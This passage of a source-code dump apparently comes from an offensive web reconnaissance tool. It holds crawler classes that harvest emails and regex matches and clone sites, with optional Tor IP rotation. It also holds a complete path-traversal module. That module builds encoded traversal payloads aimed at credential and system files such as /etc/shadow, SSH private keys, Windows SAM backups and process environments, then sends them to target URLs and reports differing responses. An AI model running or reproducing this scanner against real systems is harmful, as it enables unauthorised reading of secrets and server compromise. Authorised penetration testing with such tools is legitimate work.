None, 270 | "https" : None 271 | } 272 | 273 | if self.proxy_setting: 274 | proxy_setting = { 275 | "http" : self.proxy_setting, 276 | "https" : self.proxy_setting 277 | } 278 | if self.change_tor_ip: 279 | tor_conf.change_ip() 280 | 281 | response = requests.get(url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 282 | detected_emails = formats.validate_email(response.text) 283 | if detected_emails: 284 | msg.warning(f"url: {url} contains:") 285 | msg.success(detected_emails) 286 | for email in detected_emails: 287 | if email not in self.emails: 288 | self.emails.append(email) 289 | 290 | except Exception as e: 291 | msg.error(" " * (depth * 2) + f"Error fetching {url}: {e}") 292 | return 293 | 294 | soup = BeautifulSoup(response.text, 'html.parser') 295 | 296 | for link in soup.find_all('a', href=True): 297 | new_url = urljoin(url, link['href']) 298 | self.crawl(new_url, depth + 1, visited_pages) 299 | 300 | for script in soup.find_all('script', src=True): 301 | js_url = urljoin(url, script['src']) 302 | self.crawl(js_url, depth + 1, visited_pages) 303 | except KeyboardInterrupt: 304 | msg.error("Stopped by user!") 305 | sys.exit() 306 | 307 | class regx: 308 | def __init__(self,target_url,target_url_file,timeout,follow_redirect, cookie, user_agent, tls_validation,proxy_setting, depth, regx_string,change_tor_ip=False): 309 | self.target_url = target_url 310 | self.target_url_file = target_url_file 311 | self.timeout = int(timeout) 312 | self.follow_redirect = follow_redirect 313 | self.cookie = cookie 314 | self.user_agent = user_agent 315 | self.tls_validation = tls_validation 316 | self.proxy_setting = proxy_setting 317 | self.max_depth = int(depth) 318 | self.regx_string = regx_string 319 | self.urls = [] 320 | self.change_tor_ip = change_tor_ip 321 | 322 | def is_alive(self,target_url): 323 | try: 324 | headers = { 325 | "User-Agent" : self.user_agent, 326 | "cookie" : self.cookie 327 | } 328 | 329 | proxy_setting = { 330 | "http" : None, 331 | "https" : None 332 | } 333 | 334 | if self.proxy_setting: 335 | proxy_setting = { 336 | "http" : self.proxy_setting, 337 | "https" : self.proxy_setting 338 | } 339 | if self.change_tor_ip: 340 | tor_conf.change_ip() 341 | 342 | res = requests.get(target_url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 343 | return True 344 | except Exception as e: 345 | msg.error(e) 346 | return False 347 | 348 | def scanner(self): 349 | try: 350 | single_or_multiple_url = 0 351 | if self.target_url: 352 | msg.info(f"starting single scan for url {self.target_url}") 353 | single_or_multiple_url = 0 354 | elif self.target_url_file: 355 | msg.info(f"starting scan for url into the file {self.target_url_file}") 356 | single_or_multiple_url = 1 357 | elif not self.regx_string: 358 | msg.error("no regx string not detected, use --regx arg") 359 | sys.exit() 360 | else: 361 | msg.error("no url detected, use --url or --url-file args") 362 | sys.exit() 363 | 364 | if single_or_multiple_url == 1 : 365 | file = Path(self.target_url_file) 366 | if not file.is_file(): 367 | msg.error(f"file {self.target_url_file} not found!") 368 | sys.exit() 369 | urls_from_file = open(self.target_url_file,"r").read() 370 | for url in urls_from_file.split("\n"): 371 | if formats.validate_url(url): 372 | self.crawl(url,0) 373 | msg.info("done!") 374 | 375 | else: 376 | if not formats.validate_url(self.target_url): 377 | msg.error(f"url {self.target_url} is invalid!") 378 | sys.exit() 379 | 380 | if self.is_alive(self.target_url): 381 | msg.info(f"Connection success for url {self.target_url}") 382 | self.crawl(self.target_url,0) 383 | msg.info("done!") 384 | except KeyboardInterrupt: 385 | msg.error("Stopped by user!") 386 | sys.exit() 387 | 388 | def crawl(self,url, depth, visited_pages=None, visited_js=None, visited_img=None): 389 | try: 390 | 391 | if visited_pages is None: 392 | visited_pages = set() 393 | if visited_js is None: 394 | visited_js = set() 395 | if visited_img is None: 396 | visited_img = set() 397 | 398 | if int(depth) > int(self.max_depth) or url in visited_pages or not formats.validate_url(url) or url in self.urls: 399 | return 400 | 401 | visited_pages.add(url) 402 | self.urls.append(url) 403 | try: 404 | headers = { 405 | "User-Agent" : self.user_agent, 406 | "cookie" : self.cookie 407 | } 408 | 409 | proxy_setting = { 410 | "http" : None, 411 | "https" : None 412 | } 413 | 414 | if self.proxy_setting: 415 | proxy_setting = { 416 | "http" : self.proxy_setting, 417 | "https" : self.proxy_setting 418 | } 419 | if self.change_tor_ip: 420 | tor_conf.change_ip() 421 | 422 | response = requests.get(url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 423 | detected_regx = re.findall(self.regx_string,response.text) 424 | 425 | if detected_regx: 426 | msg.warning(f"url: {url} contains:") 427 | msg.success(detected_regx) 428 | except Exception as e: 429 | msg.error(" " * (depth * 2) + f"Error fetching {url}: {e}") 430 | return 431 | 432 | soup = BeautifulSoup(response.text, 'html.parser') 433 | 434 | for link in soup.find_all('a', href=True): 435 | new_url = urljoin(url, link['href']) 436 | self.crawl(new_url, depth + 1, visited_pages) 437 | 438 | for script in soup.find_all('script', src=True): 439 | js_url = urljoin(url, script['src']) 440 | self.crawl(js_url, depth + 1, visited_pages) 441 | 442 | for img in soup.find_all('img', src=True): 443 | img_url = urljoin(url, img['src']) 444 | self.crawl(img_url, depth + 1, visited_pages) 445 | 446 | except KeyboardInterrupt: 447 | msg.error("Stopped by user!") 448 | sys.exit() 449 | 450 | class clone: 451 | def __init__(self,target_url,timeout,user_agent,tls_validation,proxy_setting,project_name,change_tor_ip=False): 452 | self.target_url = target_url 453 | self.project_name = project_name 454 | self.timeout = int(timeout) 455 | self.user_agent = user_agent 456 | self.tls_validation = tls_validation 457 | self.proxy_setting = proxy_setting 458 | self.change_tor_ip = change_tor_ip 459 | 460 | def save(self,url, content, base_dir='site'): 461 | try: 462 | parsed = urlparse(url) 463 | path = parsed.path if parsed.path not in ("", "/") else "/index.html" 464 | 465 | if not path or path == "/": 466 | path = "/index.html" 467 | elif path.endswith("/"): 468 | path = path + "index.html" 469 | elif not os.path.splitext(path)[1]: 470 | path += ".html" 471 | 472 | file_path = os.path.join(base_dir, parsed.netloc, path.lstrip('/')) 473 | os.makedirs(os.path.dirname(file_path), exist_ok=True) 474 | with open(file_path, 'wb') as f: 475 | f.write(content) 476 | msg.info(f"Saved: {file_path}") 477 | except KeyboardInterrupt: 478 | msg.error("Stopped by user!") 479 | sys.exit() 480 | 481 | def scanner(self): 482 | try: 483 | visited = set() 484 | queue = deque([self.target_url]) 485 | domain = urlparse(self.target_url).netloc 486 | 487 | while queue: 488 | url = queue.popleft() 489 | if url in visited: 490 | continue 491 | visited.add(url) 492 | 493 | try: 494 | headers = { 495 | "User-Agent" : self.user_agent 496 | } 497 | 498 | proxy_setting = { 499 | "http" : None, 500 | "https" : None 501 | } 502 | 503 | if self.proxy_setting: 504 | proxy_setting = { 505 | "http" : self.proxy_setting, 506 | "https" : self.proxy_setting 507 | } 508 | if self.change_tor_ip: 509 | tor_conf.change_ip() 510 | 511 | response = requests.get(url,headers=headers, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 512 | except Exception as e: 513 | return 514 | 515 | r = random_data() 516 | if not self.project_name: 517 | self.project_name = r.RandomStrings() 518 | 519 | self.save(url, response.content, self.project_name) 520 | 521 | if 'text/html' not in response.headers.get('Content-Type', ''): 522 | continue 523 | 524 | soup = BeautifulSoup(response.text, 'html.parser') 525 | 526 | for tag in soup.find_all(['a', 'img', 'script', 'link']): 527 | attr = 'href' if tag.name in ['a', 'link'] else 'src' 528 | next_url = tag.get(attr) 529 | if not next_url: 530 | continue 531 | next_url = urljoin(url, next_url) 532 | if urlparse(next_url).netloc == domain and next_url not in visited: 533 | queue.append(next_url) 534 | except KeyboardInterrupt: 535 | msg.error("Stopped by user!") 536 | sys.exit() 537 | -------------------------------------------------------------------------------- /core/traversal.py: -------------------------------------------------------------------------------- 1 | import requests, sys 2 | from core.core import msg, tor_conf 3 | from core.validate import formats 4 | from pathlib import Path 5 | import concurrent.futures 6 | from urllib.parse import urlparse, urlunparse 7 | import posixpath 8 | import urllib3 9 | urllib3.disable_warnings() 10 | 11 | class payloads: 12 | encoded_traversal_strings = [ 13 | "/", 14 | "../", 15 | "..\\", 16 | "..\/", 17 | "....//", 18 | "%2e%2e%2f", 19 | "..%252f", 20 | "%252e%252e%252f", 21 | "%c0%ae%c0%ae%c0%af", 22 | "%uff0e%uff0e%u2215", 23 | "%uff0e%uff0e%u2216", 24 | "..././", 25 | "...\.\\", 26 | "%2E%2E%2E%2E%2F%2F", 27 | ".%2e/", 28 | "....////", 29 | "....\/\/", 30 | "%%32%65%%32%65/" 31 | ] 32 | 33 | windows_file_disclosure = [ 34 | "c:/apache/logs/access.log", 35 | "c:/apache/logs/error.log", 36 | "c:/apache/php/php.ini", 37 | "c:/boot.ini", 38 | "c:/MySQL/data/mysql.err", 39 | "c:/MySQL/data/mysql.log", 40 | "c:/MySQL/my.cnf", 41 | "c:/Users/Administrator/NTUser.dat", 42 | "c:/MySQL/my.cnf", 43 | "c:/MySQL/my.ini", 44 | "c:/php4/php.ini", 45 | "c:/php5/php.ini", 46 | "c:/php/php.ini", 47 | "c:/Program Files/Apache Group/Apache2/conf/httpd.conf", 48 | "c:/Program Files/Apache Group/Apache/conf/httpd.conf", 49 | "c:/Program Files/Apache Group/Apache/logs/access.log", 50 | "c:/Program Files/Apache Group/Apache/logs/error.log", 51 | "c:/Program Files/FileZilla Server/FileZilla Server.xml", 52 | "c:/Program Files/MySQL/data/hostname.err", 53 | "c:/Program Files/MySQL/data/mysql-bin.log", 54 | "c:/Program Files/MySQL/data/mysql.err", 55 | "c:/Program Files/MySQL/data/mysql.log", 56 | "c:/Program Files/MySQL/my.ini", 57 | "c:/Program Files/MySQL/my.cnf", 58 | "c:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err", 59 | "c:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log", 60 | "c:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err", 61 | "cC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log", 62 | "c:/Program Files/MySQL/MySQL Server 5.0/my.cnf", 63 | "c:/Program Files/MySQL/MySQL Server 5.0/my.ini", 64 | "c:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf", 65 | "c:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf", 66 | "c:/Program Files (x86)/Apache Group/Apache/conf/access.log", 67 | "c:/Program Files (x86)/Apache Group/Apache/conf/error.log", 68 | "c:/Program Files (x86)/FileZilla Server/FileZilla Server.xml", 69 | "c:/Program Files (x86)/xampp/apache/conf/httpd.conf", 70 | "c:/WINDOWS/php.ini", 71 | "c:/WINDOWS/Repair/SAM", 72 | "c:/Windows/repair/system", 73 | "c:/Windows/repair/software", 74 | "c:/Windows/repair/security", 75 | "c:/WINDOWS/System32/drivers/etc/hosts", 76 | "c:/Windows/win.ini", 77 | "c:/WINNT/php.ini", 78 | "c:/WINNT/win.ini", 79 | "c:/xampp/apache/bin/php.ini", 80 | "c:/xampp/apache/logs/access.log", 81 | "c:/xampp/apache/logs/error.log", 82 | "c:/Windows/Panther/Unattend/Unattended.xml", 83 | "c:/Windows/Panther/Unattended.xml", 84 | "c:/Windows/debug/NetSetup.log", 85 | "c:/Windows/system32/config/AppEvent.Evt", 86 | "c:/Windows/system32/config/SecEvent.Evt", 87 | "c:/Windows/system32/config/default.sav", 88 | "c:/Windows/system32/config/security.sav", 89 | "c:/Windows/system32/config/software.sav", 90 | "c:/Windows/system32/config/system.sav", 91 | "c:/Windows/system32/config/regback/default", 92 | "c:/Windows/system32/config/regback/sam", 93 | "c:/Windows/system32/config/regback/security", 94 | "c:/Windows/system32/config/regback/system", 95 | "c:/Windows/system32/config/regback/software", 96 | "c:/Program Files/MySQL/MySQL Server 5.1/my.ini", 97 | "c:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml", 98 | "c:/Windows/System32/inetsrv/config/applicationHost.config", 99 | ] 100 | 101 | linux_file_disclosure = [ 102 | "etc/passwd", 103 | "etc/passwd%00.png", 104 | "etc/passwd%00.jpg", 105 | "etc/passwd%00.php", 106 | "etc/passwd%00.html" 107 | "etc/shadow", 108 | "etc/aliases", 109 | "etc/anacrontab", 110 | "etc/apache2/apache2.conf", 111 | "etc/apache2/httpd.conf", 112 | "etc/at.allow", 113 | "etc/at.deny", 114 | "etc/bashrc", 115 | "etc/bootptab", 116 | "etc/chrootUsers", 117 | "etc/chttp.conf", 118 | "etc/cron.allow", 119 | "etc/cron.deny", 120 | "etc/crontab", 121 | "etc/cups/cupsd.conf", 122 | "etc/exports", 123 | "etc/fstab", 124 | "etc/ftpaccess", 125 | "etc/ftpchroot", 126 | "etc/ftphosts", 127 | "etc/groups", 128 | "etc/grub.conf", 129 | "etc/hosts", 130 | "etc/hosts.allow", 131 | "etc/hosts.deny", 132 | "etc/httpd/access.conf", 133 | "etc/httpd/conf/httpd.conf", 134 | "etc/httpd/httpd.conf", 135 | "etc/httpd/logs/access_log", 136 | "etc/httpd/logs/access.log", 137 | "etc/httpd/logs/error_log", 138 | "etc/httpd/logs/error.log", 139 | "etc/httpd/php.ini", 140 | "etc/httpd/srm.conf", 141 | "etc/inetd.conf", 142 | "etc/inittab", 143 | "etc/issue", 144 | "etc/lighttpd.conf", 145 | "etc/lilo.conf", 146 | "etc/logrotate.d/ftp", 147 | "etc/logrotate.d/proftpd", 148 | "etc/logrotate.d/vsftpd.log", 149 | "etc/lsb-release", 150 | "etc/motd", 151 | "etc/modules.conf", 152 | "etc/motd", 153 | "etc/mtab", 154 | "etc/my.cnf", 155 | "etc/my.conf", 156 | "etc/mysql/my.cnf", 157 | "etc/network/interfaces", 158 | "etc/networks", 159 | "etc/npasswd", 160 | "etc/passwd", 161 | "etc/php4.4/fcgi/php.ini", 162 | "etc/php4/apache2/php.ini", 163 | "etc/php4/apache/php.ini", 164 | "etc/php4/cgi/php.ini", 165 | "etc/php4/apache2/php.ini", 166 | "etc/php5/apache2/php.ini", 167 | "etc/php5/apache/php.ini", 168 | "etc/php/apache2/php.ini", 169 | "etc/php/apache/php.ini", 170 | "etc/php/cgi/php.ini", 171 | "etc/php.ini", 172 | "etc/php/php4/php.ini", 173 | "etc/php/php.ini", 174 | "etc/printcap", 175 | "etc/profile", 176 | "etc/proftp.conf", 177 | "etc/proftpd/proftpd.conf", 178 | "etc/pure-ftpd.conf", 179 | "etc/pureftpd.passwd", 180 | "etc/pureftpd.pdb", 181 | "etc/pure-ftpd/pure-ftpd.conf", 182 | "etc/pure-ftpd/pure-ftpd.pdb", 183 | "etc/pure-ftpd/putreftpd.pdb", 184 | "etc/redhat-release", 185 | "etc/resolv.conf", 186 | "etc/samba/smb.conf", 187 | "etc/snmpd.conf", 188 | "etc/ssh/ssh_config", 189 | "etc/ssh/sshd_config", 190 | "etc/ssh/ssh_host_dsa_key", 191 | "etc/ssh/ssh_host_dsa_key.pub", 192 | "etc/ssh/ssh_host_key", 193 | "etc/ssh/ssh_host_key.pub", 194 | "etc/sysconfig/network", 195 | "etc/syslog.conf", 196 | "etc/termcap", 197 | "etc/vhcs2/proftpd/proftpd.conf", 198 | "etc/vsftpd.chroot_list", 199 | "etc/vsftpd.conf", 200 | "etc/vsftpd/vsftpd.conf", 201 | "etc/wu-ftpd/ftpaccess", 202 | "etc/wu-ftpd/ftphosts", 203 | "etc/wu-ftpd/ftpusers", 204 | "logs/pure-ftpd.log", 205 | "logs/security_debug_log", 206 | "logs/security_log", 207 | "opt/lampp/etc/httpd.conf", 208 | "opt/xampp/etc/php.ini", 209 | "proc/cpuinfo", 210 | "proc/filesystems", 211 | "proc/interrupts", 212 | "proc/ioports", 213 | "proc/meminfo", 214 | "proc/modules", 215 | "proc/mounts", 216 | "proc/stat", 217 | "proc/swaps", 218 | "proc/version", 219 | "proc/self/net/arp", 220 | "proc/self/cwd/db.json", 221 | "proc/self/cwd/flag.txt", 222 | "proc/self/cwd/app.py", 223 | "proc/self/environ", 224 | "root/anaconda-ks.cfg", 225 | "usr/etc/pure-ftpd.conf", 226 | "usr/lib/php.ini", 227 | "usr/lib/php/php.ini", 228 | "usr/local/apache/conf/modsec.conf", 229 | "usr/local/apache/conf/php.ini", 230 | "usr/local/apache/log", 231 | "usr/local/apache/logs", 232 | "usr/local/apache/logs/access_log", 233 | "usr/local/apache/logs/access.log", 234 | "usr/local/apache/audit_log", 235 | "usr/local/apache/error_log", 236 | "usr/local/apache/error.log", 237 | "usr/local/cpanel/logs", 238 | "usr/local/cpanel/logs/access_log", 239 | "usr/local/cpanel/logs/error_log", 240 | "usr/local/cpanel/logs/license_log", 241 | "usr/local/cpanel/logs/login_log", 242 | "usr/local/cpanel/logs/stats_log", 243 | "usr/local/etc/httpd/logs/access_log", 244 | "usr/local/etc/httpd/logs/error_log", 245 | "usr/local/etc/php.ini", 246 | "usr/local/etc/pure-ftpd.conf", 247 | "usr/local/etc/pureftpd.pdb", 248 | "usr/local/lib/php.ini", 249 | "usr/local/php4/httpd.conf", 250 | "usr/local/php4/httpd.conf.php", 251 | "usr/local/php4/lib/php.ini", 252 | "usr/local/php5/httpd.conf", 253 | "usr/local/php5/httpd.conf.php", 254 | "usr/local/php5/lib/php.ini", 255 | "usr/local/php/httpd.conf", 256 | "usr/local/php/httpd.conf.ini", 257 | "usr/local/php/lib/php.ini", 258 | "usr/local/pureftpd/etc/pure-ftpd.conf", 259 | "usr/local/pureftpd/etc/pureftpd.pdn", 260 | "usr/local/pureftpd/sbin/pure-config.pl", 261 | "usr/local/www/logs/httpd_log", 262 | "usr/local/Zend/etc/php.ini", 263 | "usr/sbin/pure-config.pl", 264 | "var/adm/log/xferlog", 265 | "var/apache2/config.inc", 266 | "var/apache/logs/access_log", 267 | "var/apache/logs/error_log", 268 | "var/cpanel/cpanel.config", 269 | "var/lib/mysql/my.cnf", 270 | "var/lib/mysql/mysql/user.MYD", 271 | "var/local/www/conf/php.ini", 272 | "var/log/apache2/access_log", 273 | "var/log/apache2/access.log", 274 | "var/log/apache2/error_log", 275 | "var/log/apache2/error.log", 276 | "var/log/apache/access_log", 277 | "var/log/apache/access.log", 278 | "var/log/apache/error_log", 279 | "var/log/apache/error.log", 280 | "var/log/apache-ssl/access.log", 281 | "var/log/apache-ssl/error.log", 282 | "var/log/auth.log", 283 | "var/log/boot", 284 | "var/htmp", 285 | "var/log/chttp.log", 286 | "var/log/cups/error.log", 287 | "var/log/daemon.log", 288 | "var/log/debug", 289 | "var/log/dmesg", 290 | "var/log/dpkg.log", 291 | "var/log/exim_mainlog", 292 | "var/log/exim/mainlog", 293 | "var/log/exim_paniclog", 294 | "var/log/exim.paniclog", 295 | "var/log/exim_rejectlog", 296 | "var/log/exim/rejectlog", 297 | "var/log/faillog", 298 | "var/log/ftplog", 299 | "var/log/ftp-proxy", 300 | "var/log/ftp-proxy/ftp-proxy.log", 301 | "var/log/httpd/access_log", 302 | "var/log/httpd/access.log", 303 | "var/log/httpd/error_log", 304 | "var/log/httpd/error.log", 305 | "var/log/httpsd/ssl.access_log", 306 | "var/log/httpsd/ssl_log", 307 | "var/log/kern.log", 308 | "var/log/lastlog", 309 | "var/log/lighttpd/access.log", 310 | "var/log/lighttpd/error.log", 311 | "var/log/lighttpd/lighttpd.access.log", 312 | "var/log/lighttpd/lighttpd.error.log", 313 | "var/log/mail.info", 314 | "var/log/mail.log", 315 | "var/log/maillog", 316 | "var/log/mail.warn", 317 | "var/log/message", 318 | "var/log/messages", 319 | "var/log/mysqlderror.log", 320 | "var/log/mysql.log", 321 | "var/log/mysql/mysql-bin.log", 322 | "var/log/mysql/mysql.log", 323 | "var/log/mysql/mysql-slow.log", 324 | "var/log/proftpd", 325 | "var/log/pureftpd.log", 326 | "var/log/pure-ftpd/pure-ftpd.log", 327 | "var/log/secure", 328 | "var/log/vsftpd.log", 329 | "var/log/wtmp", 330 | "var/log/xferlog", 331 | "var/log/yum.log", 332 | "var/mysql.log", 333 | "var/run/utmp", 334 | "var/spool/cron/crontabs/root", 335 | "var/webmin/miniserv.log", 336 | "var/www/log/access_log", 337 | "var/www/log/error_log", 338 | "var/www/logs/access_log", 339 | "var/www/logs/error_log", 340 | "var/www/logs/access.log", 341 | "var/www/logs/error.log", 342 | "~/.atfp_history", 343 | "~/.bash_history", 344 | "~/.bash_logout", 345 | "~/.bash_profile", 346 | "~/.bashrc", 347 | "~/.gtkrc", 348 | "~/.login", 349 | "~/.logout", 350 | "~/.mysql_history", 351 | "~/.nano_history", 352 | "~/.php_history", 353 | "~/.profile", 354 | "~/.ssh/authorized_keys", 355 | "~/.ssh/id_dsa", 356 | "~/.ssh/id_dsa.pub", 357 | "~/.ssh/id_rsa", 358 | "~/.ssh/id_rsa.pub", 359 | "~/.ssh/identity", 360 | "~/.ssh/identity.pub", 361 | "~/.viminfo", 362 | "~/.wm_style", 363 | "~/.Xdefaults", 364 | "~/.xinitrc", 365 | "~/.Xresources", 366 | "~/.xsession", 367 | ] 368 | 369 | other_path = [ 370 | "cgi-bin/" 371 | ] 372 | 373 | class traversal: 374 | def __init__(self,target_url,target_url_file,timeout,follow_redirect,cookie,user_agent,tls_validation,proxy_setting,max_depth,target_os,threads,min_depth,verbose,custom_path=[],custom_traversal_strings=[],custom_file_disclosure=[],change_tor_ip=False): 375 | self.target_url = target_url 376 | self.target_url_file = target_url_file 377 | self.timeout = int(timeout) 378 | self.follow_redirect = follow_redirect 379 | self.cookie = cookie 380 | self.user_agent = user_agent 381 | self.tls_validation = tls_validation 382 | self.proxy_setting = proxy_setting 383 | self.max_depth = int(max_depth) 384 | self.min_depth = int(min_depth) 385 | self.target_os = target_os 386 | self.threads = threads 387 | self.payloads_list = [] 388 | self.count = 0 389 | self.count2 = 0 390 | self.detected = [] 391 | self.scanned = [] 392 | self.verbose = verbose 393 | self.custom_traversal_strings = custom_traversal_strings 394 | self.custom_path = custom_path 395 | self.custom_file_disclosure = custom_file_disclosure 396 | self.change_tor_ip = change_tor_ip 397 | 398 | 399 | def scanner(self): 400 | try: 401 | single_or_multiple_url = 0 402 | if self.target_url: 403 | msg.info(f"Starting single scan for url {self.target_url}") 404 | single_or_multiple_url = 0 405 | elif self.target_url_file: 406 | msg.info(f"Starting scan for URLs into the file {self.target_url_file}") 407 | single_or_multiple_url = 1 408 | else: 409 | msg.error("no url detected, use --url or --url-file args") 410 | sys.exit() 411 | 412 | if self.min_depth > self.max_depth: 413 | msg.error("--min-depth cant be greater than --max-depth") 414 | sys.exit() 415 | 416 | if single_or_multiple_url == 1 : 417 | file = Path(self.target_url_file) 418 | if not file.is_file(): 419 | msg.error(f"file {self.target_url_file} not found!") 420 | sys.exit() 421 | 422 | self.create_payloads() 423 | msg.success(f"[{self.count}] payloads have been loaded!") 424 | 425 | urls_from_file = open(self.target_url_file,"r").read() 426 | for url in urls_from_file.split("\n"): 427 | if formats.validate_url(url): 428 | if self.normalized_url(url) in self.scanned: 429 | if self.verbose: 430 | msg.info(f"{self.normalized_url(url)} has already been scanned! skip...") 431 | pass 432 | else: 433 | self.count2 = 0 434 | msg.warning(f"Scanning url {url}") 435 | with concurrent.futures.ThreadPoolExecutor(max_workers=int(self.threads)) as executor: 436 | future_to_url = {executor.submit(self.check,url,payload): payload for payload in self.payloads_list} 437 | 438 | for future in concurrent.futures.as_completed(future_to_url): 439 | future.result() 440 | self.scanned.append(self.normalized_url(url)) 441 | msg.info("done!") 442 | 443 | else: 444 | if not formats.validate_url(self.target_url): 445 | msg.error(f"url {self.target_url} is invalid!") 446 | sys.exit() 447 | 448 | if self.is_alive(self.target_url): 449 | msg.info(f"Connection success for url {self.target_url}") 450 | self.create_payloads() 451 | msg.success(f"[{self.count}] payloads have been loaded!") 452 | 453 | with concurrent.futures.ThreadPoolExecutor(max_workers=int(self.threads)) as executor: 454 | future_to_url = {executor.submit(self.check,self.target_url,payload): payload for payload in self.payloads_list} 455 | 456 | for future in concurrent.futures.as_completed(future_to_url): 457 | future.result() 458 | 459 | msg.info("done!") 460 | except KeyboardInterrupt: 461 | msg.error("Stopped by user!") 462 | sys.exit() 463 | 464 | def normalized_url(self,url): 465 | parsed = urlparse(url) 466 | parsed = parsed._replace(query="") 467 | new_path = posixpath.join(posixpath.dirname(parsed.path), '') 468 | new_parsed = parsed._replace(path=new_path) 469 | new_url = urlunparse(new_parsed) 470 | return new_url 471 | 472 | def payloads(self,os_payloads=[],traversal_string_list=[],path_list=[]): 473 | if int(self.min_depth) > int(self.max_depth): 474 | return 475 | 476 | for o in path_list: 477 | for s in traversal_string_list: 478 | for p in os_payloads: 479 | data = f"{o}{s * self.min_depth}{p}" 480 | self.payloads_list.append(data) 481 | self.count = self.count + 1 482 | 483 | for s in traversal_string_list: 484 | for p in os_payloads: 485 | data = f"{s * self.min_depth}{p}" 486 | self.payloads_list.append(data) 487 | self.count = self.count + 1 488 | 489 | self.min_depth=self.min_depth+1 490 | self.payloads(os_payloads,traversal_string_list,path_list) 491 | 492 | 493 | def create_payloads(self): 494 | custom_traversal_strings_list = payloads.encoded_traversal_strings 495 | if self.custom_traversal_strings: 496 | msg.info("custom path traversal string detected") 497 | custom_traversal_strings_list = self.custom_traversal_strings 498 | 499 | custom_path_list = payloads.other_path 500 | if self.custom_path: 501 | msg.info("custom path detected") 502 | custom_path_list = self.custom_path 503 | 504 | if self.custom_file_disclosure: 505 | msg.info("custom file disclosure detected") 506 | self.payloads(self.custom_file_disclosure,custom_traversal_strings_list,custom_path_list) 507 | else: 508 | if self.target_os.lower() =='linux': 509 | msg.info("Loading linux path traversal payloads") 510 | self.payloads(payloads.linux_file_disclosure,custom_traversal_strings_list,custom_path_list) 511 | 512 | elif self.target_os.lower() == 'windows': 513 | msg.info("Loading windows path traversal payloads") 514 | self.payloads(payloads.windows_file_disclosure,custom_traversal_strings_list,custom_path_list) 515 | else: 516 | msg.info("Loading linux and windows path traversal payloads") 517 | self.payloads(payloads.windows_file_disclosure,custom_traversal_strings_list,custom_path_list) 518 | self.payloads(payloads.linux_file_disclosure,custom_traversal_strings_list,custom_path_list) 519 | 520 | def is_alive(self,target_url): 521 | try: 522 | headers = { 523 | "User-Agent" : self.user_agent, 524 | "cookie" : self.cookie 525 | } 526 | 527 | proxy_setting = { 528 | "http" : None, 529 | "https" : None 530 | } 531 | 532 | if self.proxy_setting: 533 | proxy_setting = { 534 | "http" : self.proxy_setting, 535 | "https" : self.proxy_setting 536 | } 537 | if self.change_tor_ip: 538 | tor_conf.change_ip() 539 | 540 | res = requests.get(target_url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 541 | return True 542 | except Exception as e: 543 | msg.error(e) 544 | return False 545 | 546 | def check(self,url,payload): 547 | print(f"Running [{self.count2}/{self.count}] ",end="\r") 548 | 549 | if url in self.detected: 550 | return 551 | 552 | try: 553 | headers = { 554 | "User-Agent" : self.user_agent, 555 | "cookie" : self.cookie 556 | } 557 | 558 | proxy_setting = { 559 | "http" : None, 560 | "https" : None 561 | } 562 | 563 | if self.proxy_setting: 564 | proxy_setting = { 565 | "http" : self.proxy_setting, 566 | "https" : self.proxy_setting 567 | } 568 | 569 | if self.change_tor_ip: 570 | tor_conf.change_ip() 571 | 572 | response = requests.get(url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 573 | 574 | new_url = "" 575 | if "FUZZ" in url: 576 | new_url = url.replace("FUZZ",payload) 577 | else: 578 | parsed = urlparse(url) 579 | parsed = parsed._replace(query="") 580 | new_path = posixpath.join(posixpath.dirname(parsed.path), payload) 581 | new_parsed = parsed._replace(path=new_path) 582 | new_url = urlunparse(new_parsed) 583 | 584 | if self.verbose: 585 | msg.normal(new_url) 586 | 587 | response2 = requests.get(new_url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 588 | 589 | if response2.status_code == 200 and len(response.text) != len(response2.text): #and response2.headers["Content-Type"]=="text/plain": 590 | msg.warning(f"Interesting response detected at [{url}] with payload [{payload}], status code {response2.status_code} and Content-Length {len(response2.text)} != {len(response.text)} ") 591 | self.detected.append(url) 592 | msg.success(f"first 31 chars [{response2.text[0:31]}]") 593 | except Exception as e: 594 | if self.verbose: 595 | msg.error(e) 596 | pass 597 | self.count2 = self.count2 +1 598 | 599 | 600 | --------------------------------------------------------------------------------